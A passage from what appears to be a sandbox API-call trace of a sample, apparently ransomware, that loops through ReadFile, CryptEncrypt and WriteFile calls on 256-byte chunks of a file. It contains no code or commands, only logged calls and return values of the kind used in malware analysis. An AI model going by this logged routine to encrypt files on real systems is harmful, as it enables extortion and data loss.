lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.313] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.313] GetLastError () returned 0x0 [0145.313] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.313] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.313] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.313] GetLastError () returned 0x0 [0145.313] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.313] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.313] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.313] GetLastError () returned 0x0 [0145.313] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.313] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.313] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.313] GetLastError () returned 0x0 [0145.313] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.313] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.314] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.314] GetLastError () returned 0x0 [0145.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.314] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.314] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.314] GetLastError () returned 0x0 [0145.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.314] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.314] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.314] GetLastError () returned 0x0 [0145.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.314] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.314] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.314] GetLastError () returned 0x0 [0145.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.314] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.314] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.314] GetLastError () returned 0x0 [0145.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.314] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.314] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.314] GetLastError () returned 0x0 [0145.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.314] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.314] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.314] GetLastError () returned 0x0 [0145.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.315] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.315] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.315] GetLastError () returned 0x0 [0145.315] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.315] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.315] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.315] GetLastError () returned 0x0 [0145.315] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.315] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.315] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.315] GetLastError () returned 0x0 [0145.315] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.315] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.315] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.315] GetLastError () returned 0x0 [0145.315] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.315] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.315] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.315] GetLastError () returned 0x0 [0145.315] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.315] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.315] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.315] GetLastError () returned 0x0 [0145.315] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.316] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.316] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.316] GetLastError () returned 0x0 [0145.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.316] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.316] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.316] GetLastError () returned 0x0 [0145.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.316] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.316] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.316] GetLastError () returned 0x0 [0145.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.316] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.316] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.316] GetLastError () returned 0x0 [0145.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.316] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.316] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.316] GetLastError () returned 0x0 [0145.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.316] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.316] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.316] GetLastError () returned 0x0 [0145.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.316] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.317] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.317] GetLastError () returned 0x0 [0145.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.317] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.317] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.317] GetLastError () returned 0x0 [0145.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.317] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.317] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.317] GetLastError () returned 0x0 [0145.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.317] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.317] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.317] GetLastError () returned 0x0 [0145.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.317] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.317] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.317] GetLastError () returned 0x0 [0145.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.317] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.317] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.317] GetLastError () returned 0x0 [0145.317] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.318] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.318] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.318] GetLastError () returned 0x0 [0145.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.318] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.318] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.318] GetLastError () returned 0x0 [0145.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.318] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.318] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.318] GetLastError () returned 0x0 [0145.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.318] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 